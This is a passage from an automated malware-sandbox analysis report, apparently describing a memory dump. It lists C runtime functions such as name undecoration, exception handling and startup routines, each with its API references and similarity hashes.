Instruction Fuzzy Hash: 75514DB5A04109ABDB04CFD4D891EEF77B9AF58348F148519F90A8B280D734EA91EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1976E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1976F7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E197702

Strings

MOC, xrefs: 6E19771B
RCC, xrefs: 6E197726

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: MOC$RCC
API String ID: 984050374-2084237596
Opcode ID: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction ID: f54786721bce34e2fb93a59f3a085bad67e03d43bcba5a1cb5fc6809ca2133e6
Opcode Fuzzy Hash: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction Fuzzy Hash: 4B510175900109EBDB04CFD8C990EEE73B9AF58304F64855AE915A72D0E734ED81EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EED0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19EEF4

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::DName.LIBVCRUNTIMED ref: 6E19EF49

Strings

A, xrefs: 6E19EFDB

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: 54079bbbe0802c7b1107faa8c0516124c9ed66b7edfa51e7268be6d0979858b5
Instruction ID: a2635b9a237f86c3426b6e9a9bff2733c05239cb8405293b2ab8c80f25e36504
Opcode Fuzzy Hash: 54079bbbe0802c7b1107faa8c0516124c9ed66b7edfa51e7268be6d0979858b5
Instruction Fuzzy Hash: E151CFB0904508EFCB04DFE8D8909EEBBBABF59304F148559F4599B244DB30AA85EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1F50, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A1F8C
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A2003
Mailbox.LIBCMTD ref: 6E1A203F
Mailbox.LIBCMTD ref: 6E1A205A
DName::isEmpty.LIBCMTD ref: 6E1A2062
DName::operator+=.LIBCMTD ref: 6E1A207F
DName::operator+=.LIBCMTD ref: 6E1A20AE
DName::operator+=.LIBCMTD ref: 6E1A20B8
Mailbox.LIBCMTD ref: 6E1A2101

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
String ID:
API String ID: 3761117093-0
Opcode ID: ed1f6f3a1349ab08ac89de1f42c4d51397d1fa7ecc86cb963e4ef3b93a2d5360
Instruction ID: 0eb8e1dedc2bbab2c5f41e4c26601c5d42f2611a5002b2d2acc8a572ef043b79
Opcode Fuzzy Hash: ed1f6f3a1349ab08ac89de1f42c4d51397d1fa7ecc86cb963e4ef3b93a2d5360
Instruction Fuzzy Hash: CA51D874D01514DFCB05DFA4D8A4BFE777AFB11304F108659D525972C0DB715A84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0C30, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1A0C95
DName::isEmpty.LIBCMTD ref: 6E1A0CA1
DName::isEmpty.LIBCMTD ref: 6E1A0CC5
DName::DName.LIBVCRUNTIMED ref: 6E1A0D44
DName::isEmpty.LIBCMTD ref: 6E1A0D58
DName::isEmpty.LIBCMTD ref: 6E1A0D70
DName::isEmpty.LIBCMTD ref: 6E1A0D7C
DName::operator+=.LIBCMTD ref: 6E1A0D8A
Mailbox.LIBCMTD ref: 6E1A0DA2

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: EmptyName::is$MailboxNameName::Name::operator+=
String ID:
API String ID: 2270187897-0
Opcode ID: 6a520e50fa74bd119f44896328ee69485532f533c25285929caa104784e839f8
Instruction ID: c43dcef559621d95c9858426b51818e28c2045eb5f4331c9d7e0302481f301f0
Opcode Fuzzy Hash: 6a520e50fa74bd119f44896328ee69485532f533c25285929caa104784e839f8
Instruction Fuzzy Hash: 87418075A10109EBCB04DFD8D9A09FE73B9AF54304F508558EA169B294FB30EE84EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19DF10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19DF1D

Part of subcall function 6E199060: pDNameNode::pDNameNode.LIBCMTD ref: 6E19909A

operator+.LIBVCRUNTIMED ref: 6E19DF52
DName::isEmpty.LIBCMTD ref: 6E19DF74

Part of subcall function 6E1A04F0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A04F9

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19DFEA
Mailbox.LIBCMTD ref: 6E19E006

Strings

X, xrefs: 6E19DF3D

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
String ID: X
API String ID: 3628514644-3081909835
Opcode ID: da957de84f3bec753b49f7191db05fdbb9e074c6b9a186c983c1e394092aacdf
Instruction ID: d357ad58c69d5cb9ad703d9ee22aa0270aab28ae58c036d58c25730ceb7366d5
Opcode Fuzzy Hash: da957de84f3bec753b49f7191db05fdbb9e074c6b9a186c983c1e394092aacdf
Instruction Fuzzy Hash: 95318475D00108FFCB05DFE4D891AEE7BB9AF45708F148159E6146B280FB71AB84EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E02E0, Relevance: 12.1, APIs: 8, Instructions: 141timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1E0399
__MarkAllocaS.LIBCMTD ref: 6E1E03A2

Part of subcall function 6E1D81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1D81E3

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E03BD
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E03C8
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E03E3
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E0447
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 6E1E046E
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E047A

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
String ID:
API String ID: 2378836076-0
Opcode ID: 198c46bf6a71277ef64b658b131260c81e37fb8da99d71140d82e679ba292ac8
Instruction ID: caf1c33d81b9323129e6bca3674db06c3eac88f1d4afaa7d5c577a4bb6d6ec1f
Opcode Fuzzy Hash: 198c46bf6a71277ef64b658b131260c81e37fb8da99d71140d82e679ba292ac8
Instruction Fuzzy Hash: 59514C74910609EFDB04DFD8C891BEEB7B8BF54308F504558F51167281EB74AE85EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0DD0, Relevance: 12.1, APIs: 8, Instructions: 127COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0E5B
UnDecorator::doMSKeywords.LIBCMTD ref: 6E1A0E60
DName::operator+=.LIBCMTD ref: 6E1A0E72

Part of subcall function 6E199AD0: DName::isValid.LIBCMTD ref: 6E199ADC
Part of subcall function 6E199AD0: DName::isEmpty.LIBCMTD ref: 6E199AF0

Part of subcall function 6E199E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E199E26

Part of subcall function 6E199990: DName::isValid.LIBCMTD ref: 6E19999C
Part of subcall function 6E199990: DName::isEmpty.LIBCMTD ref: 6E1999B1

DName::DName.LIBVCRUNTIMED ref: 6E1A0F0A

Part of subcall function 6E199990: DName::append.LIBCMTD ref: 6E199A14

DName::operator+=.LIBCMTD ref: 6E1A0F4C
Mailbox.LIBCMTD ref: 6E1A0F58
DName::DName.LIBVCRUNTIMED ref: 6E1A0F69
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0F78

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
String ID:
API String ID: 4042095736-0
Opcode ID: 0b344a4b600ec6b1ea15e6280b0efdbf058ac95da701dc74be61993fbbf92d91
Instruction ID: ec6903b9a2dc008d6f2a1cda2a98f782d5d8df8a8923e7f879800e694616b1fc
Opcode Fuzzy Hash: 0b344a4b600ec6b1ea15e6280b0efdbf058ac95da701dc74be61993fbbf92d91
Instruction Fuzzy Hash: ED51C574D00109EFCB05DFE8C8A1AFEBBB5BF45304F108569E6157B294EB706A84EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A35D0, Relevance: 12.1, APIs: 8, Instructions: 121COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A35E7

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::isValid.LIBCMTD ref: 6E1A3603
DName::DName.LIBVCRUNTIMED ref: 6E1A3611

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Name::isNode::makeStatusValid
String ID:
API String ID: 4056879799-0
Opcode ID: 9b6e52b6a4b7f9e92192e37ee2f10fc7bd93ffdab3e1b18700004416b81cd8d3
Instruction ID: dafb377f46e47de5eaa6113fef20ba88366c8cb6c9d2745d2f1d2e711d2a049f
Opcode Fuzzy Hash: 9b6e52b6a4b7f9e92192e37ee2f10fc7bd93ffdab3e1b18700004416b81cd8d3
Instruction Fuzzy Hash: EC41E6B4900114DFCB05DBE8D8A5BFE7778FF11308F000959E6225B280EB70AA85EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199A30, Relevance: 12.1, APIs: 8, Instructions: 51COMMON

Download Yara Rule

APIs

DName::isValid.LIBCMTD ref: 6E199A3C
DName::isEmpty.LIBCMTD ref: 6E199A48
DName::isEmpty.LIBCMTD ref: 6E199A54
DName::operator=.LIBVCRUNTIMED ref: 6E199A69

Part of subcall function 6E199680: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1996B7

Mailbox.LIBCMTD ref: 6E199A77
DName::isEmpty.LIBCMTD ref: 6E199A81
DName::operator+=.LIBCMTD ref: 6E199AA4

Part of subcall function 6E199C00: DName::isValid.LIBCMTD ref: 6E199C0A
Part of subcall function 6E199C00: DName::isEmpty.LIBCMTD ref: 6E199C16
Part of subcall function 6E199C00: DName::operator=.LIBVCRUNTIMED ref: 6E199C32

DName::append.LIBCMTD ref: 6E199AB4

Part of subcall function 6E198AF0: pairNode::pairNode.LIBCMTD ref: 6E198B26

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
String ID:
API String ID: 1694665504-0
Opcode ID: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction ID: 16f8c1fdbbcb4f22476a0c6b89982bc4102790bc26e71995fed350c98d1a15dd
Opcode Fuzzy Hash: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction Fuzzy Hash: 5D111E34A04109EFCB04DFEAD9A5AEDB779EF84244F10446999069F290DF30AEC1FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1967D0, Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

___unDName.LIBVCRUNTIMED ref: 6E196821

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name___un
String ID:
API String ID: 3905892445-0
Opcode ID: e48f4e736de2d47ab7fba20a517d5f0b47e49384294bae0326b13d8204c288de
Instruction ID: 3c8777653b6f6883e79eb820d0860de6392cc42cff678fda7819158682d9ef0d
Opcode Fuzzy Hash: e48f4e736de2d47ab7fba20a517d5f0b47e49384294bae0326b13d8204c288de
Instruction Fuzzy Hash: FD510DB1D1010DAFDB04DFE5D890AEEB7B8BF14304F504569E51677290EB346E85EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A2650, Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

DName::getString.LIBCMTD ref: 6E1A26EB

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::getString
String ID:
API String ID: 1028460119-0
Opcode ID: 85ec252d2414fa8a573ad60e95d3ca57d213bdaa893fd33e20014376f560c225
Instruction ID: 7a2bf5e352fadcd950e4a626cf08253a775f0a9cd45b23e694bf0640475e9b2a
Opcode Fuzzy Hash: 85ec252d2414fa8a573ad60e95d3ca57d213bdaa893fd33e20014376f560c225
Instruction Fuzzy Hash: 87415475D00108EFCB05DFE9D9909FD77F9AF59304F144429E519AB284E7306A84EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EA30, Relevance: 9.1, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EA39
DName::DName.LIBVCRUNTIMED ref: 6E19EB0A
operator+.LIBVCRUNTIMED ref: 6E19EB77
Mailbox.LIBCMTD ref: 6E19EB83
Mailbox.LIBCMTD ref: 6E19EB8F
DName::DName.LIBVCRUNTIMED ref: 6E19EBA0

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
String ID:
API String ID: 3503010255-0
Opcode ID: b97b2cf47f63b1570bd0d17487ba15bf2eafd31a7c6e285af6605ff65968b651
Instruction ID: 0e7fc67d4a3dbb1f8a67510431e6bfe843ca9a2f2788a1750726ff197e1143ee
Opcode Fuzzy Hash: b97b2cf47f63b1570bd0d17487ba15bf2eafd31a7c6e285af6605ff65968b651
Instruction Fuzzy Hash: 8F411DB1D01108EFCB05DFE4D9A19DEBBF5BB46305F10416AE5067B294EB305B84EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C470, Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19C487

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::operator+.LIBCMTD ref: 6E19C4AC
DName::operator+=.LIBCMTD ref: 6E19C4CB
DName::DName.LIBVCRUNTIMED ref: 6E19C4F8

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
String ID:
API String ID: 2485589204-0
Opcode ID: a5756d75c03ec4d0f164954c4cd31a8cf0294320466a2c210652445e879b3978
Instruction ID: 79f05e6a38ee0462b55cd1dde073b1f469945a2981c6c18210ef64cd0c6f5b9e
Opcode Fuzzy Hash: a5756d75c03ec4d0f164954c4cd31a8cf0294320466a2c210652445e879b3978
Instruction Fuzzy Hash: AA21C4B0A04518DFEB04DBA4D8A5BFE7775AB42304F004458E9565F2C1D771A980FB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5290, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221timeCOMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMTD ref: 6E1D5325
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1D5443

Part of subcall function 6E1D61B0: __wcstombs_l.LIBCMTD ref: 6E1D61CD

__invoke_watson_if_error.LIBCMTD ref: 6E1D5510

Strings

*, xrefs: 6E1D5347
?, xrefs: 6E1D534B

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
String ID: *$?
API String ID: 3210742261-2367018687
Opcode ID: d28e29ffcda279a627dd372eb62050f37e70ece2e2feecfa1bfce6d2371db37d
Instruction ID: fbe8e3fd6d7241e2699a260bfa21051b4e32149d8b5c5a2b0485172816ec0e31
Opcode Fuzzy Hash: d28e29ffcda279a627dd372eb62050f37e70ece2e2feecfa1bfce6d2371db37d
Instruction Fuzzy Hash: A89137B4D1020DEFCB04DFD8D891BEEB7B9EF54308F204569D515AB281EB706A89DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A19C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A1A20
DName::DName.LIBVCRUNTIMED ref: 6E1A1AA1
Mailbox.LIBCMTD ref: 6E1A1AC1

Strings

_, xrefs: 6E1A1A15
@, xrefs: 6E1A19F4

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: NameName::$Mailbox
String ID: @$_
API String ID: 4073702289-2246572305
Opcode ID: 9497683a32a0bb385cfcaf0f5f52291f6786398da5c7dba9b47acce601832bb5
Instruction ID: 5cf365611a8784b3a5f79580796cde564732e7d1d5bef194bb80681749ce8e30
Opcode Fuzzy Hash: 9497683a32a0bb385cfcaf0f5f52291f6786398da5c7dba9b47acce601832bb5
Instruction Fuzzy Hash: C631A770601D44DFCB05DFB4D5949B97BB6FB42708F145299EA254B380D770A984DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E197F32, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6E196000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E196006
Part of subcall function 6E196000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E19601C

___vcrt_getptd.LIBVCRUNTIMED ref: 6E197F4F
___vcrt_getptd.LIBVCRUNTIMED ref: 6E197F5A
__IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 6E197FB0
___DestructExceptionObject.LIBCMTD ref: 6E197FD5

Strings

csm, xrefs: 6E197F68

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
String ID: csm
API String ID: 485384042-1018135373
Opcode ID: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction ID: 6c3d48a6a983da433e32be3c284e43b175f01ddbae4c6c4a82189e3b68070785
Opcode Fuzzy Hash: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction Fuzzy Hash: 3C211774900209DFCB08CEA4D090BDE7B76BF54309F64846AE8252FA91D734DAC1EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E194160, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E194193
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1941A7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1941B7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1941C2

Strings

csm, xrefs: 6E194188

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction ID: 6b19668d79311a0d6a8d33be18385fbf7cdecf466f9d2616210a1d3be95576ba
Opcode Fuzzy Hash: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction Fuzzy Hash: 8B11C578900209DFCB04DFE8C18059DBBB5FF58344F1189AAD865AB310DB34EA81FB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E19D370, Relevance: 7.6, APIs: 5, Instructions: 149COMMON

Download Yara Rule

APIs

UnDecorator::doMSKeywords.LIBCMTD ref: 6E19D3BE
Mailbox.LIBCMTD ref: 6E19D52F
DName::DName.LIBVCRUNTIMED ref: 6E19D3B9

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::DName.LIBVCRUNTIMED ref: 6E19D540
DName::DName.LIBVCRUNTIMED ref: 6E19D551

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
String ID:
API String ID: 2417761376-0
Opcode ID: e7c0734a57441520053c0f15d8c4200b372bf46810073b72a1fc96331a01d704
Instruction ID: 26441d22f92509ff7eddc1be1af3cde308897458205aacffc6a1926046c511f7
Opcode Fuzzy Hash: e7c0734a57441520053c0f15d8c4200b372bf46810073b72a1fc96331a01d704
Instruction Fuzzy Hash: 485150F1C41208EFEB04DFE4D851ADEBBB5AF15309F14846AE5066A180E7315B84FF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3330, Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A333C

Part of subcall function 6E1A40B0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A40B9
Part of subcall function 6E1A40B0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A4116
Part of subcall function 6E1A40B0: operator+.LIBVCRUNTIMED ref: 6E1A4127
Part of subcall function 6E1A40B0: Mailbox.LIBCMTD ref: 6E1A4133
Part of subcall function 6E1A40B0: Mailbox.LIBCMTD ref: 6E1A4225

Mailbox.LIBCMTD ref: 6E1A33A3
DName::length.LIBVCRUNTIMED ref: 6E1A33BF
DName::getString.LIBCMTD ref: 6E1A33FB

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
String ID:
API String ID: 245642696-0
Opcode ID: ddf711f6a8c93681d6a5cdcf2c80a70f0e69abccbb550cc95acd04dc88133da6
Instruction ID: 7487fe7d10150ca07ed38cba41640fbcbb4f1e9005a7ce4fc249bc946b01c12d
Opcode Fuzzy Hash: ddf711f6a8c93681d6a5cdcf2c80a70f0e69abccbb550cc95acd04dc88133da6
Instruction Fuzzy Hash: 9941A479D08249EFCB05CFE8C490AFEBBB5AF55304F24809DDA51A7341DB31AA85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E192D80, Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

___scrt_acquire_startup_lock.LIBCMTD ref: 6E192DDB
___scrt_fastfail.LIBCMTD ref: 6E192DF5
___scrt_dllmain_uninitialize_c.LIBCMTD ref: 6E192DFA
__RTC_Initialize.LIBCMTD ref: 6E192E04
___scrt_uninitialize_crt.LIBCMTD ref: 6E192E36

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Initialize___scrt_acquire_startup_lock___scrt_dllmain_uninitialize_c___scrt_fastfail___scrt_uninitialize_crt
String ID:
API String ID: 485910261-0
Opcode ID: eb4769f70b6f18f906ac4f623addc1f44c6f428537a3d59c0e6540d742e5b819
Instruction ID: dd21ac3d67d5a88e03bd4a3761891e10e2b6f7ffcc5abfc29bb314256165b4dc
Opcode Fuzzy Hash: eb4769f70b6f18f906ac4f623addc1f44c6f428537a3d59c0e6540d742e5b819
Instruction Fuzzy Hash: 9521AC71909619EFDB00DFF5E988B8ABAF9FB02718F000619D0059B280DB794684FBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EE30, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EE53
DName::operator+.LIBCMTD ref: 6E19EE92
DName::operator+.LIBCMTD ref: 6E19EEA5
Mailbox.LIBCMTD ref: 6E19EEAE
Mailbox.LIBCMTD ref: 6E19EEBA

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2657989147-0
Opcode ID: 1c1a1aebfd8c8cf84eae274961692ec8cafa3dc7f56e69bcabf21f95e01a9e23
Instruction ID: ed81212ccfa1585a7fbd2bc78a364eaae5cbbf7b5594c60a381c24dd1a582e02
Opcode Fuzzy Hash: 1c1a1aebfd8c8cf84eae274961692ec8cafa3dc7f56e69bcabf21f95e01a9e23
Instruction Fuzzy Hash: F711F1B5D1020CEFCB04DFE4D851BEEB7BDAB44204F108569E515A7280EB346B44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3F90, Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1D3E89,00000000,00000800,?,?,6E1D3E89,00000000), ref: 6E1D3FA1
GetLastError.KERNEL32(?,?,6E1D3E89), ref: 6E1D3FB5
_wcsncmp.LIBCMTD ref: 6E1D3FCB
_wcsncmp.LIBCMTD ref: 6E1D3FE2
LoadLibraryExW.KERNEL32(6E1D3E89,00000000,00000000,?,?,?,?,6E1D3E89), ref: 6E1D3FF6

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: LibraryLoad_wcsncmp$ErrorLast
String ID:
API String ID: 180994465-0
Opcode ID: a3eccb64b82cd4b857bccd6fa40465da2bc594c413479d8e6030568f9508e74c
Instruction ID: 62864909ff81850ebb8fc41da7af6b1565859de0045132d224bc55a0375f07b0
Opcode Fuzzy Hash: a3eccb64b82cd4b857bccd6fa40465da2bc594c413479d8e6030568f9508e74c
Instruction Fuzzy Hash: DF018175A4420DFBDB109BE1DD4AFDE37BA9B15B00F208410FE09DA285DA74DA88A7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C7F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 6E199E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E199E26

DName::DName.LIBVCRUNTIMED ref: 6E19C892
DName::operator+=.LIBCMTD ref: 6E19C8A3
Mailbox.LIBCMTD ref: 6E19C8D0

Strings

5, xrefs: 6E19C84B

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
String ID: 5
API String ID: 3298578019-2226203566
Opcode ID: 18e6528e0055742f654d7c5220a243195ed0acf6e9588231a3d89022f8618d2d
Instruction ID: 2bd41f1943c12923939fe5323e7cec702f6605be9333a92958b6ff7baa283cd1
Opcode Fuzzy Hash: 18e6528e0055742f654d7c5220a243195ed0acf6e9588231a3d89022f8618d2d
Instruction Fuzzy Hash: 962182B1C00209EFCB04DFD4D861AEEBBB5BF55304F144569E5556B290EB306AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E196D10, Relevance: 6.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMTD ref: 6E196E13
___AdjustPointer.LIBCMTD ref: 6E196E5D
___AdjustPointer.LIBCMTD ref: 6E196F0F
___AdjustPointer.LIBCMTD ref: 6E196EC7

Part of subcall function 6E1AD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1CC799,?,?,6E1A5367,?), ref: 6E1AD2D2

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AdjustPointer$FeaturePresentProcessor
String ID:
API String ID: 3874303849-0
Opcode ID: d3b2e94866b33ca20891b8e6cdc3fc24c14f44d81545c8cc9ddd84cbc7c3feef
Instruction ID: fd413330a16652d9458b2e7a06b6ee53db485e7e6db038356125f315bda3df47
Opcode Fuzzy Hash: d3b2e94866b33ca20891b8e6cdc3fc24c14f44d81545c8cc9ddd84cbc7c3feef
Instruction Fuzzy Hash: EB911A74A1020EDFCB44CF98D494BAA77B6FB59309F208459E8259B390C735ED81EBE1

Uniqueness

